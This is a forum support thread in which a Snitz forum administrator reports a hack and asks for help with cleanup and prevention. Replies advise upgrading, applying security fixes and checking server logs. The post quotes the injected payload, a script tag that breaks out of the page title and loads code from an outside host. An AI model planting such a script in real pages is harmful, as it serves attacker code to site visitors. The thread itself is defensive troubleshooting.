The Forum has been Updated
The code has been upgraded to the latest .NET core version. Please check instructions in the Community Announcements about migrating your account.
Hi
http://www.thegamersguild.co.uk/forum/
</title><script src=http://google-stats49.info/ur.php></script> seems to be what they entered.
You can see this on the Title of General forum.
I was under the impression Snitz was not vunerable to SQL injection?
What can I do to clean this up?
What can I do to prevent it happening.
Thanks
Ben
http://www.thegamersguild.co.uk/forum/
</title><script src=http://google-stats49.info/ur.php></script> seems to be what they entered.
You can see this on the Title of General forum.
I was under the impression Snitz was not vunerable to SQL injection?
What can I do to clean this up?
What can I do to prevent it happening.
Thanks
Ben
Posted
You cannot make any assumptions unless you are running our latest version, with the latest security fixes applied. The current version with all the fixes applied (I would almost risk saying the downloadable version has the security fixes applied, but I can't say it with complete certainty) has no known vulnerabilities. In the current day and age that's all we can guarantee.
I would say that if you don't have mods, just upgrade to the latest version and check if the most recent security fixes are applied. If you have mods and don't want to apply them again, I suggest that you apply all the security fixes that are applicable to your forum version (3.4.06).
You can also have a look at the server logs, to find out how they did hacked the forum. Should be rather easy to do that, if you have access to the server logs.
I would say that if you don't have mods, just upgrade to the latest version and check if the most recent security fixes are applied. If you have mods and don't want to apply them again, I suggest that you apply all the security fixes that are applicable to your forum version (3.4.06).
You can also have a look at the server logs, to find out how they did hacked the forum. Should be rather easy to do that, if you have access to the server logs.
Posted
OK I upgraded to the lastest version.
What about security fixeds for the latest version?
E.g. http://forum.snitz.com/forum/topic.asp?TOPIC_ID=69117
Have these been added to the download or need I do these manually?
What about security fixeds for the latest version?
E.g. http://forum.snitz.com/forum/topic.asp?TOPIC_ID=69117
Have these been added to the download or need I do these manually?
Posted
Unfortunately I cannot be sure they are included. If someone else can shed any light on that, please do.
It is, however, easy to check if they are in the code. Just have a look at how the code should look after the fixes (each fix provides information about that) and confirm that the fixes are in the downloaded code. If they are not, then add them.
I will perform this check later, as I can't do it where I am now.
It is, however, easy to check if they are in the code. Just have a look at how the code should look after the fixes (each fix provides information about that) and confirm that the fixes are in the downloaded code. If they are not, then add them.
I will perform this check later, as I can't do it where I am now.